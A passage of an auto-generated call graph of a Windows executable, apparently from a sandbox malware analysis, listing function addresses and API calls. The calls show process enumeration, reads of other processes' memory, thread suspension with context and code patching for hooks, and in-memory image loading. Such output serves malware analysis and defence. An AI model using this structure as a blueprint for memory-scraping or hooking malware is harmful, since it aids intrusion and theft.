StrStrIW 5838->5839 5840 4080eb wcscat 5838->5840 5842 40811c wcscpy 5839->5842 5839->5843 5841 408041 LoadLibraryW 5840->5841 5841->5843 5842->5843 5843->5834 5843->5835 5843->5837 5844 408159 5843->5844 5845 406efb LoadLibraryW 5844->5845 5845->5834 5847 402b57 wcscat 5846->5847 5847->5833 5849 404c49 2 API calls 5848->5849 5850 40543c 5849->5850 5851 404ba6 LoadLibraryW 5850->5851 5852 405444 5851->5852 5853 406efb LoadLibraryW 5852->5853 5854 405451 5853->5854 5855 401038 2 API calls 5854->5855 5856 40546b 5855->5856 5856->5810 5858 406efb LoadLibraryW 5857->5858 5859 404b82 5858->5859 5859->5771 5859->5774 6378 40aecf 6379 404b40 VirtualAlloc 6378->6379 6380 40aee5 6379->6380 6412 40a1d2 GetModuleHandleW 6380->6412 6382 408649 43 API calls 6386 40b00d 6382->6386 6383 40aefc 6384 406efb LoadLibraryW 6383->6384 6407 40afe9 6383->6407 6385 40af38 6384->6385 6387 404c17 2 API calls 6385->6387 6388 40b01b _endthreadex 6386->6388 6389 40af46 6387->6389 6424 403ca7 6389->6424 6394 402e20 7 API calls 6395 40af76 6394->6395 6433 4053a3 6395->6433 6398 40afa8 6436 4053cb 6398->6436 6399 406efb LoadLibraryW 6400 40af92 6399->6400 6403 406efb LoadLibraryW 6400->6403 6403->6398 6407->6382 6409 408649 43 API calls 6410 40afe3 6409->6410 6469 40ac8e memset 6410->6469 6413 40a1fc GetProcAddress 6412->6413 6417 40a1f5 6412->6417 6414 40a20f 6413->6414 6413->6417 6415 40887b 8 API calls 6414->6415 6416 40a230 6415->6416 6416->6417 6418 404c49 2 API calls 6416->6418 6417->6383 6419 40a255 6418->6419 6419->6417 6420 40a286 6419->6420 6421 40a276 6419->6421 6423 403ad5 24 API calls 6420->6423 6422 407388 12 API calls 6421->6422 6422->6417 6423->6417 6425 403cad 6424->6425 6478 403bfd 6425->6478 6428 402df5 6429 404c49 2 API calls 6428->6429 6430 402e00 6429->6430 6431 403ca7 2 API calls 6430->6431 6432 402e1b 6430->6432 6431->6430 6432->6394 6434 406efb LoadLibraryW 6433->6434 6435 4053b3 6434->6435 6435->6398 6435->6399 6437 4053d9 6436->6437 6443 405427 6436->6443 6438 406efb LoadLibraryW 6437->6438 6439 4053e5 6438->6439 6440 406efb LoadLibraryW 6439->6440 6439->6443 6441 405412 6440->6441 6442 401038 2 API calls 6441->6442 6442->6443 6443->6407 6444 4046f2 memset 6443->6444 6445 406efb LoadLibraryW 6444->6445 6446 404729 6445->6446 6447 406efb LoadLibraryW 6446->6447 6448 40473d 6447->6448 6449 406efb LoadLibraryW 6448->6449 6450 404752 6449->6450 6451 404761 6450->6451 6453 406efb LoadLibraryW 6450->6453 6456 401038 2 API calls 6450->6456 6482 401088 6450->6482 6452 401038 2 API calls 6451->6452 6454 404769 6452->6454 6453->6450 6457 407659 6454->6457 6456->6450 6458 406efb LoadLibraryW 6457->6458 6459 40766f memset 6458->6459 6460 404c49 2 API calls 6459->6460 6461 4076a8 6460->6461 6462 4076da CreateProcessW 6461->6462 6463 407709 6462->6463 6464 4076f5 GetExitCodeProcess 6462->6464 6465 401038 2 API calls 6463->6465 6464->6463 6466 407722 6465->6466 6467 401038 2 API calls 6466->6467 6468 40772a 6467->6468 6468->6407 6468->6409 6470 401000 LoadLibraryW 6469->6470 6474 40acbf 6470->6474 6471 40acec 6492 40aae9 memset memset memset 6471->6492 6474->6471 6475 407734 9 API calls 6474->6475 6476 40acd8 6475->6476 6485 4086b2 6476->6485 6479 403c0a 6478->6479 6480 403c2c 6478->6480 6481 403c0f GetTickCount Sleep 6479->6481 6480->6428 6481->6480 6481->6481 6483 406efb LoadLibraryW 6482->6483 6484 401098 6483->6484 6484->6450 6486 406efb LoadLibraryW 6485->6486 6487 4086ca 6486->6487 6488 406efb LoadLibraryW 6487->6488 6491 4086f2 6487->6491 6488->6491 6489 40870e 6489->6471 6490 401050 2 API calls 6490->6489 6491->6489 6491->6490 6493 401000 LoadLibraryW 6492->6493 6494 40ab5b 6493->6494 6495 406efb LoadLibraryW 6494->6495 6496 40ab6b 6495->6496 6497 406efb LoadLibraryW 6496->6497 6498 40ab8d memset wsprintfW 6497->6498 6500 406efb LoadLibraryW 6498->6500 6501 40abf3 GetCurrentProcess 6500->6501 6503 406efb LoadLibraryW 6501->6503 6504 40ac28 6503->6504 6505 406efb LoadLibraryW 6504->6505 6506 40ac3f 6505->6506 6507 406efb LoadLibraryW 6506->6507 6508 40ac58 6507->6508 6509 406efb LoadLibraryW 6508->6509 6510 40ac6e 6509->6510 6515 40aa73 memset memset 6510->6515 6513 406efb LoadLibraryW 6514 40ac83 6513->6514 6514->6407 6516 401000 LoadLibraryW 6515->6516 6517 40aabc wsprintfW 6516->6517 6520 40a5f5 6517->6520 6521 406efb LoadLibraryW 6520->6521 6522 40a616 6521->6522 6523 406efb LoadLibraryW 6522->6523 6524 40a6b6 6523->6524 6525 404c17 2 API calls 6524->6525 6541 40a8ac 6524->6541 6526 40a707 6525->6526 6527 404c17 2 API calls 6526->6527 6528 40a725 6527->6528 6529 406efb LoadLibraryW 6528->6529 6530 40a736 6529->6530 6531 406efb LoadLibraryW 6530->6531 6532 40a74f 6531->6532 6533 406efb LoadLibraryW 6532->6533 6535 40a881 6532->6535 6534 40a795 6533->6534 6537 406efb LoadLibraryW 6534->6537 6536 401038 2 API calls 6535->6536 6538 40a8a2 6536->6538 6539 40a7ac 6537->6539 6540 401038 2 API calls 6538->6540 6542 401038 2 API calls 6539->6542 6540->6541 6541->6513 6543 40a7be 6542->6543 6544 401038 2 API calls 6543->6544 6545 40a7c8 6544->6545 6546 406efb LoadLibraryW 6545->6546 6547 40a7de 6546->6547 6547->6535 6548 404c49 2 API calls 6547->6548 6549 40a805 6548->6549 6550 406efb LoadLibraryW 6549->6550 6552 40a827 6550->6552 6551 40a86d 6554 406efb LoadLibraryW 6551->6554 6552->6551 6553 409ba4 68 API calls 6552->6553 6553->6551 6554->6535 6555 4094d0 6556 404bcf LoadLibraryW 6555->6556 6558 4094e3 6556->6558 6557 4095a6 _endthreadex 6558->6557 6559 40956f 6558->6559 6560 404c49 2 API calls 6558->6560 6559->6557 6561 40950a 6560->6561 6561->6559 6562 409577 6561->6562 6563 40952e 6561->6563 6562->6559 6617 4091f3 6562->6617 6572 405fe6 6563->6572 6567 406efb LoadLibraryW 6568 40954b 6567->6568 6569 406efb LoadLibraryW 6568->6569 6570 409564 6569->6570 6609 405e0c 6570->6609 6669 405c21 6572->6669 6574 405ff9 6575 406013 6574->6575 6576 40602a 6574->6576 6579 405ffe 6574->6579 6577 406efb LoadLibraryW 6575->6577 6578 405c21 SetLastError 6576->6578 6577->6579 6580 40603b 6578->6580 6579->6559 6579->6567 6580->6579 6581 4060cf 6580->6581 6583 406060 SetLastError 6580->6583 6585 406070 6580->6585 6582 406efb LoadLibraryW 6581->6582 6582->6579 6583->6579 6584 4060aa GetNativeSystemInfo 6584->6581 6586 4060e4 6584->6586 6585->6581 6585->6584 6587 406efb LoadLibraryW 6586->6587 6588 4060f4 6587->6588 6589 406106 VirtualAlloc 6588->6589 6590 40611b GetProcessHeap HeapAlloc 6588->6590 6589->6590 6591 40613d 6589->6591 6592 406132 6590->6592 6593 40615f 6590->6593 6595 406efb LoadLibraryW 6591->6595 6594 406efb LoadLibraryW 6592->6594 6596 405c21 SetLastError 6593->6596 6594->6591 6595->6579 6597 406199 6596->6597 6598 4061a2 VirtualAlloc 6597->6598 6599 40624c 6597->6599 6600 4061c2 6598->6600 6601 405e0c 4 API calls 6599->6601 6672 405d37 6600->6672 6601->6579 6603 4061db 6603->6599 6679 405e89 6603->6679 6607 406215 6607->6579 6607->6599 6608 406efb LoadLibraryW 6607->6608 6608->6599 6610 405e87 6609->6610 6615 405e13 6609->6615 6610->6559 6611 405e58 6612 405e77 GetProcessHeap HeapFree 6611->6612 6614 406efb LoadLibraryW 6611->6614 6612->6610 6613 405e4e free 6613->6611 6616 405e6c 6614->6616 6615->6611 6615->6613 6616->6612 6618 40920a 6617->6618 6619 40920e 6617->6619 6618->6559 6620 406efb LoadLibraryW 6619->6620 6633 40921c 6619->6633 6621 409233 6620->6621 6622 406efb LoadLibraryW 6621->6622 6623 409243 6622->6623 6702 40914c 6623->6702 6625 409256 6626 406efb LoadLibraryW 6625->6626 6627 409277 GetThreadContext 6626->6627 6629 4092b0 6627->6629 6630 4092a1 6627->6630 6632 406efb LoadLibraryW 6629->6632 6631 401088 LoadLibraryW 6630->6631 6631->6633 6634 4092cd 6632->6634 6633->6559 6634->6630 6635 409344 6634->6635 6636 4092ef 6634->6636 6637 406efb LoadLibraryW 6635->6637 6638 406efb LoadLibraryW 6636->6638 6640 409325 6637->6640 6639 4092ff 6638->6639 6641 409331 6639->6641 6642 409317 6639->6642 6640->6630 6645 409371 6640->6645 6644 406efb LoadLibraryW 6641->6644 6643 406efb LoadLibraryW 6642->6643 6643->6640 6644->6640 6646 406efb LoadLibraryW 6645->6646 6648 409381 6646->6648 6647 4093e6 6649 406efb LoadLibraryW 6647->6649 6648->6647 6650 406efb LoadLibraryW 6648->6650 6651 4093fc 6649->6651 6650->6648 6652 406efb LoadLibraryW 6651->6652 6653 409426 6652->6653 6654 406efb LoadLibraryW 6653->6654 6656 409439 6654->6656 6655 409489 6658 406efb LoadLibraryW 6655->6658 6656->6655 6657 409459 6656->6657 6659 406efb LoadLibraryW 6656->6659 6713 4050a7 6657->6713 6660 40949f 6658->6660 6659->6657 6665 401038 2 API calls 6660->6665 6663 40946e 6663->6655 6667 406efb LoadLibraryW 6663->6667 6664 401088 LoadLibraryW 6664->6663 6666 4094be 6665->6666 6668 401038 2 API calls 6666->6668 6667->6655 6668->6633 6670 405c35 6669->6670 6671 405c29 SetLastError 6669->6671 6670->6574 6671->6574 6673 405e01 6672->6673 6674 405d5f 6672->6674 6673->6603 6674->6673 6675 405d75 VirtualAlloc 6674->6675 6676 405c21 SetLastError 6674->6676 6678 405db6 VirtualAlloc 6674->6678 6675->6673 6677 405d8d memset 6675->6677 6676->6674 6677->6674 6678->6673 6678->6674 6680 405eac IsBadReadPtr 6679->6680 6687 405ea5 6679->6687 6684 405ec6 6680->6684 6680->6687 6681 405ef2 realloc 6682 405fa1 SetLastError 6681->6682 6681->6684 6682->6687 6684->6681 6684->6682 6685 405f84 IsBadReadPtr 6684->6685 6686 405fbe 6684->6686 6684->6687 6685->6684 6685->6687 6688 406efb LoadLibraryW 6686->6688 6687->6599 6689 405c39 6687->6689 6688->6687 6694 405c67 6689->6694 6690 405d18 6691 405b6a 2 API calls 6690->6691 6692 405d29 6691->6692 6692->6607 6694->6690 6694->6692 6695 405b6a 6694->6695 6696 405b7d 6695->6696 6697 405b76 6695->6697 6698 405b89 6696->6698 6699 405bbb VirtualProtect 6696->6699 6697->6694 6698->6697 6701 405baa VirtualFree 6698->6701 6699->6697 6701->6697 6703 404c49 2 API calls 6702->6703 6704 40915e 6703->6704 6705 401000 LoadLibraryW 6704->6705 6706 409166 6705->6706 6707 4091a3 memset 6706->6707 6708 409179 wcslen 6706->6708 6710 406efb LoadLibraryW 6707->6710 6709 404c49 2 API calls 6708->6709 6711 40918d wsprintfW 6709->6711 6712 4091c4 6710->6712 6711->6707 6712->6625 6714 406efb LoadLibraryW 6713->6714 6715 4050bc 6714->6715 6716 406efb LoadLibraryW 6715->6716 6717 4050d7 6716->6717 6718 406efb LoadLibraryW 6717->6718 6719 4050ea 6718->6719 6720 406efb LoadLibraryW 6719->6720 6721 40511a 6720->6721 6722 405132 6721->6722 6723 405139 WaitForInputIdle 6721->6723 6722->6663 6722->6664 6724 406efb LoadLibraryW 6723->6724 6725 405151 6724->6725 6733 404f80 6725->6733 6728 406efb LoadLibraryW 6729 40517a 6728->6729 6729->6722 6730 406efb LoadLibraryW 6729->6730 6731 4051aa 6730->6731 6732 406efb LoadLibraryW 6731->6732 6732->6722 6734 406efb LoadLibraryW 6733->6734 6735 404fa3 6734->6735 6736 406efb LoadLibraryW 6735->6736 6743 40509c 6735->6743 6737 404fd4 6736->6737 6738 406efb LoadLibraryW 6737->6738 6739 405062 6738->6739 6740 405095 6739->6740 6742 406efb LoadLibraryW 6739->6742 6741 401068 2 API calls 6740->6741 6741->6743 6744 40507e 6742->6744 6743->6728 6745 401068 2 API calls 6744->6745 6745->6740 6847 406b90 6848 406ba9 6847->6848 6849 404b40 VirtualAlloc 6848->6849 6877 406c20 6848->6877 6850 406bc0 6849->6850 6883 40684a strlen StrCmpNA 6850->6883 6852 406bcb 6853 406bd5 StrStrIA 6852->6853 6854 406c8e 6852->6854 6855 406be9 6853->6855 6896 406692 EnterCriticalSection 6854->6896 6858 406c29 6855->6858 6859 406bed 6855->6859 6861 4069dd VirtualAlloc 6858->6861 6884 4067f0 6859->6884 6862 406c30 6861->6862 6867 404c17 2 API calls 6862->6867 6862->6877 6863 406bf4 6863->6877 6892 4069dd 6863->6892 6865 404c17 2 API calls 6866 406caa 6865->6866 6871 404b40 VirtualAlloc 6866->6871 6869 406c43 6867->6869 6876 404b40 VirtualAlloc 6869->6876 6873 406cbe 6871->6873 6872 406c11 strlen 6874 404b40 VirtualAlloc 6872->6874 6875 404b40 VirtualAlloc 6873->6875 6874->6877 6878 406ccb CreateThread WaitForSingleObject 6875->6878 6879 406c54 6876->6879 6880 406d01 6878->6880 6918 40a13c 68 API calls 6878->6918 6881 404b40 VirtualAlloc 6879->6881 6900 4066dc EnterCriticalSection 6880->6900 6882 406c61 CreateThread WaitForSingleObject 6881->6882 6882->6877 6917 40a13c 68 API calls 6882->6917 6883->6852 6885 406801 EnterCriticalSection 6884->6885 6886 4067f9 6884->6886 6888 404c17 2 API calls 6885->6888 6905 406785 EnterCriticalSection 6886->6905 6889 406816 LeaveCriticalSection 6888->6889 6889->6863 6890 4067ff 6890->6863 6893 406a52 6892->6893 6894 4069e9 6892->6894 6893->6872 6893->6877 6894->6893 6912 406961 6894->6912 6899 4066af 6896->6899 6897 4066be LeaveCriticalSection 6898 4066ba 6897->6898 6898->6865 6898->6877 6898->6880 6899->6897 6899->6898 6901 40676f LeaveCriticalSection 6900->6901 6903 4066fc 6900->6903 6901->6877 6902 404bcf LoadLibraryW 6902->6903 6903->6902 6904 40676e 6903->6904 6904->6901 6906 4067a5 6905->6906 6907 40679e 6905->6907 6909 4067e1 LeaveCriticalSection 6906->6909 6910 404c17 2 API calls 6906->6910 6908 404c17 2 API calls 6907->6908 6908->6906 6909->6890 6911 4067bb 6910->6911 6911->6909 6913 406984 6912->6913 6914 40696a 6912->6914 6913->6893 6914->6913 6915 404b40 VirtualAlloc 6914->6915 6916 406980 6915->6916 6916->6893 6919 40a990 6920 404b40 VirtualAlloc 6919->6920 6921 40a9a5 6920->6921 6922 404c49 2 API calls 6921->6922 6926 40a9b3 6922->6926 6923 40aa1b 6924 4089a3 3 API calls 6923->6924 6929 40aa27 6924->6929 6925 4089a3 3 API calls 6925->6926 6926->6923 6926->6925 6927 40a9f3 sprintf 6926->6927 6928 40a9da sprintf 6926->6928 6927->6926 6928->6926 6930 40a5f5 69 API calls 6929->6930 6932 40aa3a 6929->6932 6930->6932 6931 408649 43 API calls 6933 40aa50 6931->6933 6932->6931 6934 40aa60 _endthreadex 6933->6934 5062 405211 5079 404c49 5062->5079 5064 40522b 5065 404c49 2 API calls 5064->5065 5066 405235 5065->5066 5067 405239 memset 5066->5067 5082 406efb 5067->5082 5069 405262 CreateToolhelp32Snapshot 5071 405272 5069->5071 5072 406efb LoadLibraryW 5071->5072 5073 406efb LoadLibraryW 5071->5073 5076 4052d6 _beginthreadex 5071->5076 5077 406efb LoadLibraryW 5071->5077 5086 401038 5071->5086 5075 405339 Sleep 5072->5075 5074 405317 Process32NextW 5073->5074 5074->5071 5075->5067 5076->5071 5078 405305 Sleep 5077->5078 5078->5071 5080 406efb LoadLibraryW 5079->5080 5081 404c59 VirtualAlloc 5080->5081 5081->5064 5083 406f0c LoadLibraryW 5082->5083 5085 406f8d 5082->5085 5083->5085 5085->5069 5087 406efb LoadLibraryW 5086->5087 5088 401048 CloseHandle 5087->5088 5088->5071 6935 405a94 GetProcAddress 6749 4051d7 6750 404c49 2 API calls 6749->6750 6751 4051e2 6750->6751 6752 4050a7 3 API calls 6751->6752 6753 4051f9 6752->6753 6754 4051ff _endthreadex 6753->6754 6207 40341c 6208 404c49 2 API calls 6207->6208 6209 403426 6208->6209 6210 406d1c 6211 406d3e 6210->6211 6212 406d5f 6211->6212 6214 404a6a 6211->6214 6215 404990 4 API calls 6214->6215 6216 404a76 6215->6216 6217 404b40 VirtualAlloc 6216->6217 6221 404ad6 6216->6221 6218 404a87 6217->6218 6229 404a42 StrStrIA 6218->6229 6221->6211 6222 404a96 StrStrIA 6222->6221 6223 404aab 6222->6223 6224 404c17 2 API calls 6223->6224 6225 404ab7 6224->6225 6232 4049da 6225->6232 6227 404ac2 6227->6221 6239 40a0f7 6227->6239 6230 404a65 6229->6230 6231 404a5b strlen 6229->6231 6230->6221 6230->6222 6231->6230 6233 4049e3 6232->6233 6234 404a3e 6232->6234 6233->6234 6235 4049ed StrStrIA 6233->6235 6234->6227 6235->6234 6236 4049ff 6235->6236 6236->6236 6237 404a13 strlen 6236->6237 6238 404a25 6237->6238 6238->6227 6240 40a106 6239->6240 6241 40632b 2 API calls 6240->6241 6242 40a10f 6241->6242 6243 40632b 2 API calls 6242->6243 6244 40a11e 6243->6244 6245 409eca 68 API calls 6244->6245 6246 40a129 6245->6246 6246->6221 6936 4057a0 6937 40574d 3 API calls 6936->6937 6938 4057b4 6937->6938 6755 4057e1 6758 40574d 6755->6758 6757 4057f5 6759 404bcf LoadLibraryW 6758->6759 6760 40575a 6759->6760 6764 40577f 6760->6764 6765 4075d5 6760->6765 6762 405773 6763 404bcf LoadLibraryW 6762->6763 6763->6764 6764->6757 6766 404c49 2 API calls 6765->6766 6767 4075f1 6766->6767 6768 406efb LoadLibraryW 6767->6768 6769 407602 6768->6769 6770 406efb LoadLibraryW 6769->6770 6772 407648 6769->6772 6771 40762a 6770->6771 6771->6772 6773 401050 2 API calls 6771->6773 6772->6762 6773->6772 6939 405aa5 LoadLibraryA 6774 40a3e6 6775 404c49 2 API calls 6774->6775 6776 40a3fd 6775->6776 6777 404c49 2 API calls 6776->6777 6778 40a417 6777->6778 6779 40a47e 6778->6779 6781 40a440 wsprintfW 6778->6781 6782 40a456 wsprintfW 6778->6782 6780 4089a3 3 API calls 6779->6780 6783 40a489 6780->6783 6781->6778 6782->6778 6784 402e20 7 API calls 6783->6784 6786 40a49b 6784->6786 6785 408649 43 API calls 6788 40a5c5 6785->6788 6804 40a5af 6786->6804 6812 405385 wcsrchr 6786->6812 6792 40a5e0 _endthreadex 6788->6792 6789 40a4cc 6790 40a4e3 6789->6790 6791 40a509 6789->6791 6793 403ca7 2 API calls 6790->6793 6794 403ca7 2 API calls 6791->6794 6795 40a4ea 6793->6795 6796 40a511 6794->6796 6797 403ca7 2 API calls 6795->6797 6798 403ca7 2 API calls 6796->6798 6799 40a4f4 wsprintfW 6797->6799 6800 40a51b wsprintfW 6798->6800 6801 40a52e 6799->6801 6800->6801 6814 40a2c1 GetModuleHandleW 6801->6814 6803 40a53b 6803->6804 6805 40a541 _wcsicmp 6803->6805 6804->6785 6806 40a576 _wcsicmp 6805->6806 6807 40a558 wsprintfW 6805->6807 6808 40a587 6806->6808 6807->6808 6809 407659 6 API calls 6808->6809 6810 40a59f 6809->6810 6811 401068 2 API calls 6810->6811 6811->6804 6813 405394 6812->6813 6813->6789 6815 40a2e8 GetProcAddress 6814->6815 6822 40a2e1 6814->6822 6816 40a2fb 6815->6816 6815->6822 6817 4064d0 3 API calls 6816->6817 6818 40a303 6817->6818 6819 40887b 8 API calls 6818->6819 6820 40a32a 6819->6820 6821 404c49 2 API calls 6820->6821 6820->6822 6823 40a356 6821->6823 6822->6803 6823->6822 6824 40a377 6823->6824 6826 40a386 6823->6826 6825 407388 12 API calls 6824->6825 6827 40a384 6825->6827 6828 403ad5 24 API calls 6826->6828 6827->6822 6829 4053cb 2 API calls 6827->6829 6828->6827 6829->6822 5860 406d68 5861 406d73 5860->5861 5861->5861 5862 406d7a InitializeCriticalSection 5861->5862 5877 401687 5862->5877 5865 406dd9 ExitThread 5868 406da5 5869 406efb LoadLibraryW 5868->5869 5871 406db2 5869->5871 5872 406dc8 5871->5872 5873 409717 31 API calls 5871->5873 5898 406988 5872->5898 5873->5872 5875 406dcd 5901 4058f2 5875->5901 5922 401631 InterlockedCompareExchange 5877->5922 5880 401697 HeapCreate 5881 4016a9 5880->5881 5926 401679 InterlockedExchange 5881->5926 5883 4016b6 5883->5865 5884 406a6d GetModuleHandleW 5883->5884 5885 406b84 5884->5885 5886 406b09 5884->5886 5885->5868 5889 409717 5885->5889 5886->5885 5887 406efb LoadLibraryW 5886->5887 5888 406b4f memcmp 5886->5888 5887->5886 5888->5885 5888->5886 5927 4016ba 5889->5927 5892 40973f 5959 40187d 5892->5959 5897 4016ba 9 API calls 5897->5892 6042 403bbc GetPEB 5898->6042 5900 406991 5900->5875 6046 40566a LoadLibraryW 5901->6046 5904 406efb LoadLibraryW 5905 405914 5904->5905 5906 406efb LoadLibraryW 5905->5906 5907 405928 5906->5907 5908 406efb LoadLibraryW 5907->5908 5909 40593a 5908->5909 5910 406efb LoadLibraryW 5909->5910 5911 40594c 5910->5911 5912 409717 31 API calls 5911->5912 5913 405969 5912->5913 5914 409717 31 API calls 5913->5914 5915 40597e 5914->5915 5916 409717 31 API calls 5915->5916 5917 405993 5916->5917 6051 4056ab 5917->6051 5919 405998 5920 4059b1 5919->5920 5921 409717 31 API calls 5919->5921 5920->5865 5921->5920 5923 401651 Sleep InterlockedCompareExchange 5922->5923 5925 401674 5922->5925 5923->5925 5925->5880 5925->5881 5926->5883 5928 401631 3 API calls 5927->5928 5929 4016d0 5928->5929 5943 401738 5929->5943 5973 401c44 VirtualQuery 5929->5973 5933 4017db 5933->5892 5944 4017e5 5933->5944 5934 401c44 VirtualQuery 5935 4016f2 5934->5935 5935->5943 5975 401b87 5935->5975 5939 40172b 5942 401734 5939->5942 5983 401154 5939->5983 5942->5943 5988 401bfa 5942->5988 5992 401679 InterlockedExchange 5943->5992 5945 401631 3 API calls 5944->5945 5946 4017f8 5945->5946 5949 401841 5946->5949 5957 40185c 5946->5957 5993 401430 5946->5993 5948 401873 5948->5897 5950 401bfa VirtualFree 5949->5950 5949->5957 5953 401855 5950->5953 6014 4011cf 5953->6014 6018 401679 InterlockedExchange 5957->6018 5960 401631 3 API calls 5959->5960 5961 40188a 5960->5961 5962 401899 5961->5962 5963 40189e 5961->5963 5967 4018a2 5961->5967 6033 40159b 5962->6033 6041 401679 InterlockedExchange 5963->6041 5966 4018fd 5966->5868 5967->5963 5968 401430 13 API calls 5967->5968 5969 4018d5 5968->5969 5970 4014da 4 API calls 5969->5970 5971 4018de 5970->5971 5972 401491 4 API calls 5971->5972 5972->5963 5974 4016e3 5973->5974 5974->5934 5974->5943 5976 401b8e 5975->5976 5977 401b9a VirtualAlloc 5976->5977 5978 401710 5976->5978 5977->5978 5978->5943 5979 401930 5978->5979 5980 401963 5979->5980 5981 401c44 VirtualQuery 5980->5981 5982 401b5f 5980->5982 5981->5982 5982->5939 5984 401185 5983->5984 5985 40115d HeapAlloc 5983->5985 5986 401182 5984->5986 5987 401193 HeapReAlloc 5984->5987 5985->5986 5986->5942 5987->5986 5990 401c0b 5988->5990 5989 401c17 5989->5943 5990->5989 5991 401c35 VirtualFree 5990->5991 5991->5989 5992->5933 6019 401363 CreateToolhelp32Snapshot 5993->6019 5995 401446 5996 40148c 5995->5996 5997 401456 OpenThread 5995->5997 6001 4014da 5996->6001 5997->5995 5998 40146a SuspendThread 5997->5998 6029 401235 GetThreadContext 5998->6029 6002 40150b VirtualProtect 6001->6002 6003 4014ff 6001->6003 6004 401524 VirtualProtect GetCurrentProcess FlushInstructionCache 6002->6004 6005 40151f 6002->6005 6003->6002 6004->6005 6007 401491 6005->6007 6008 4014d8 6007->6008 6011 401498 6007->6011 6008->5949 6009 4014c8 HeapFree 6009->6008 6010 40149e OpenThread 6010->6011 6012 4014b3 ResumeThread CloseHandle 6010->6012 6011->6009 6011->6010 6013 4014c7 6011->6013 6012->6011 6013->6009 6015 4011e5 6014->6015 6016 401229 6015->6016 6017 401212 HeapReAlloc 6015->6017 6016->5957 6017->6016 6018->5948 6020 40142e 6019->6020 6021 40137f Thread32First 6019->6021 6020->5995 6028 401396 6021->6028 6022 401424 CloseHandle 6022->6020 6023 40140c Thread32Next 6023->6028 6024 40139c GetCurrentProcessId 6024->6023 6025 4013a7 GetCurrentThreadId 6024->6025 6025->6023 6025->6028 6026 4013b8 HeapAlloc 6026->6022 6026->6028 6027 4013e1 HeapReAlloc 6027->6022 6027->6028 6028->6022 6028->6023 6028->6024 6028->6026 6028->6027 6030 401312 CloseHandle 6029->6030 6032 401263 6029->6032 6030->5995 6031 4012f0 SetThreadContext 6031->6032 6032->6030 6032->6031 6034 4015ce 6033->6034 6035 4015b0 6033->6035 6034->5963 6035->6034 6036 401430 13 API calls 6035->6036 6039 4015e1 6036->6039 6037 401622 6038 401491 4 API calls 6037->6038 6038->6034 6039->6037 6040 4014da 4 API calls 6039->6040 6040->6039 6041->5966 6043 403bcc StrCmpNIW 6042->6043 6044 403be3 6043->6044 6045 403bf3 6043->6045 6044->6043 6044->6045 6045->5900 6047 405683 GetProcAddress 6046->6047 6048 40567f 6046->6048 6049 405693 6047->6049 6050 40569c FreeLibrary 6047->6050 6048->5904 6049->6050 6050->6048 6052 404c49 2 API calls 6051->6052 6053 4056b6 6052->6053 6054 4056bd 6053->6054 6057 401000 6053->6057 6054->5919 6056 4056c8 6056->5919 6058 406efb LoadLibraryW 6057->6058 6059 401010 6058->6059 6059->6056 5419 4028ed 5420 404c49 2 API calls 5419->5420 5421 402904 5420->5421 5422 40291d memset 5421->5422 5423 406efb LoadLibraryW 5422->5423 5424 402949 CreateToolhelp32Snapshot 5423->5424 5425 406efb LoadLibraryW 5424->5425 5426 40295f Process32FirstW 5425->5426 5439 402974 5426->5439 5427 401038 CloseHandle LoadLibraryW 5427->5439 5428 406efb LoadLibraryW 5429 402ad1 Process32NextW 5428->5429 5429->5439 5430 406efb LoadLibraryW 5431 402afc Sleep 5430->5431 5431->5422 5432 406efb LoadLibraryW 5432->5439 5433 406efb LoadLibraryW 5434 4029cb GetSystemInfo 5433->5434 5435 406efb LoadLibraryW 5434->5435 5435->5439 5436 404c49 2 API calls 5436->5439 5437 406efb LoadLibraryW 5438 402a73 ReadProcessMemory 5437->5438 5438->5439 5439->5427 5439->5428 5439->5430 5439->5432 5439->5433 5439->5436 5439->5437 5441 402500 memset memset 5439->5441 5451 40254f 5441->5451 5442 4028e8 5442->5439 5443 4025d8 memset 5443->5451 5444 40278f memset 5444->5451 5445 406efb LoadLibraryW 5445->5451 5446 4023cf Sleep 5446->5451 5447 40282c memset 5447->5451 5448 402693 memset 5448->5451 5449 401102 LoadLibraryW 5449->5451 5450 402445 45 API calls 5450->5451 5451->5442 5451->5443 5451->5444 5451->5445 5451->5446 5451->5447 5451->5448 5451->5449 5451->5450 6060 40ae6e 6061 406efb LoadLibraryW 6060->6061 6062 40ae7d 6061->6062 6063 406efb LoadLibraryW 6062->6063 6064 40ae8c 6063->6064 6065 401687 5 API calls 6064->6065 6066 40ae95 6065->6066 6067 40aec6 ExitThread 6066->6067 6068 40aeac 6066->6068 6070 409717 31 API calls 6066->6070 6069 40aec1 6068->6069 6071 409717 31 API calls 6068->6071 6072 4058f2 36 API calls 6069->6072 6070->6068 6071->6069 6072->6067 6073 40706f 6074 407085 6073->6074 6075 404c49 2 API calls 6074->6075 6081 40711f 6074->6081 6076 40709d 6075->6076 6088 404990 strlen StrCmpNA 6076->6088 6080 4070bf 6080->6081 6082 404c17 2 API calls 6080->6082 6083 4070d6 6082->6083 6098 404b40 VirtualAlloc 6083->6098 6085 4070e7 6086 404b40 VirtualAlloc 6085->6086 6087 4070f3 CreateThread WaitForSingleObject 6086->6087 6087->6081 6100 40a13c 6087->6100 6089 4049b0 StrStrIA 6088->6089 6090 4049d5 6088->6090 6089->6090 6091 4049c4 StrStrIA 6089->6091 6090->6081 6092 402e8e strstr 6090->6092 6091->6090 6093 402eaa 6092->6093 6094 402ed2 6092->6094 6095 402d51 6 API calls 6093->6095 6094->6080 6096 402ec3 6095->6096 6097 404c49 2 API calls 6096->6097 6097->6094 6099 404b5d 6098->6099 6099->6085 6101 404b6f LoadLibraryW 6100->6101 6103 40a14b 6101->6103 6102 40a19e 6103->6102 6104 40632b 2 API calls 6103->6104 6105 40a170 6104->6105 6106 40632b 2 API calls 6105->6106 6107 40a184 6106->6107 6107->6102 6109 409eca GetModuleHandleW 6107->6109 6110 409ee6 GetProcAddress 6109->6110 6131 409f5b 6109->6131 6111 409efd 6110->6111 6110->6131 6112 404c49 2 API calls 6111->6112 6111->6131 6113 409f2a 6112->6113 6114 408812 2 API calls 6113->6114 6115 409f35 6114->6115 6116 4063b6 2 API calls 6115->6116 6115->6131 6117 409f50 6116->6117 6118 40887b 8 API calls 6117->6118 6117->6131 6119 409f8b 6118->6119 6120 404c49 2 API calls 6119->6120 6119->6131 6121 409fb0 6120->6121 6122 4079b2 8 API calls 6121->6122 6123 409fb9 6122->6123 6124 404c49 2 API calls 6123->6124 6125 409fbf 6124->6125 6126 407d09 25 API calls 6125->6126 6127 409fc8 6126->6127 6128 404c49 2 API calls 6127->6128 6129 409fd9 6128->6129 6130 40632b 2 API calls 6129->6130 6129->6131 6132 40a016 6130->6132 6131->6102 6132->6131 6133 404c49 2 